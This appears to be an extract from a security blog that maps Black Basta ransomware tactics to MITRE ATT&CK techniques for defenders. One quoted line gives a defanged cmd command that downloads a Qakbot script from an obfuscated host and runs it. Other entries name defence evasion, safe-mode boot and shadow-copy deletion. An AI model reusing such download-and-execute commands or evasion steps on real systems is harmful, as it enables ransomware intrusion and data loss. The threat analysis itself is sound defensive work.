Essential Insights on Black Basta Ransomware | Qualys Security Blog

MITRE Techniques

• [T1566] Phishing – The infection chain starts with spear phishing delivering a malicious link or attachment. ‘The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim.’
• [T1190] Exploit Public-Facing Application – Initial access via vulnerability exploitation and RDP. ‘Other initial infection vectors, like exploitation of vulnerabilities and remote desktop protocol (RDP), were also used by this threat actor.’
• [T1083] File and Directory Discovery – Discovery phase as the group identifies sensitive files for exfiltration. ‘Once installed, Black Basta first identifies and collects sensitive files for exfiltration.’
• [T1204.002] User Execution: Malicious File – Delivery via malicious documents/links leading to execution. ‘downloaded zip archives contain malicious .lnk(shortcut) or an Excel file that downloads and executes Qakbot malware.’
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of cmd-like commands to download and execute payloads. ‘/q /c MD “%APPDATA%xxxxxx” && curl.exe –output %APPDATA%xxxxxxqakbot.js hxxps://xxxxx[.]com/xxx.js && cd “%APPDATA%xxxxxx” && wscript qakbot.js’
• [T1047] Windows Management Instrumentation – WMI usage as part of toolset for attack phases. ‘Windows Management Instrumentation – T1047’
• [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts used for defense evasion (DisableAntiSpyware, etc.). ‘PowerShell – T1059.001’
• [T1543.003] Create or Modify System Process: Windows Service – Persistence through system processes. ‘Persistence: Create or Modify System Process: Windows Service – T1543.003’
• [T1068] Exploitation for Privilege Escalation – Exploitation of vulnerabilities to escalate privileges. ‘Exploitation for Privilege Escalation – T1068’
• [T1497] Virtualization/Sandbox Evasion – Evasion of analysis environments. ‘Virtualization/Sandbox Evasion – T1497’
• [T1562.009] Impair Defenses: Safe Mode Boot – Reboot in safe mode to disable defenses. ‘Safe Mode Boot – T1562.009’
• [T1036] Masquerading – Obfuscation and deception of files or processes. ‘Masquerading – T1036’
• [T1112] Modify Registry – Registry changes to impede defenses or customize UI. ‘Modify Registry – T1112’
• [T1562.001] Impair Defenses: Disable or Modify Tools – Disabling security tools like Windows Defender. ‘Impair Defenses: Disable or Modify Tools – T1562.001’
• [T1490] Inhibit System Recovery – Deleting shadow copies to prevent recovery. ‘Inhibit System Recovery – T1490’
• [T1486] Data Encrypted for Impact – Encrypting data to cause impact. ‘Data Encrypted for Impact – T1486’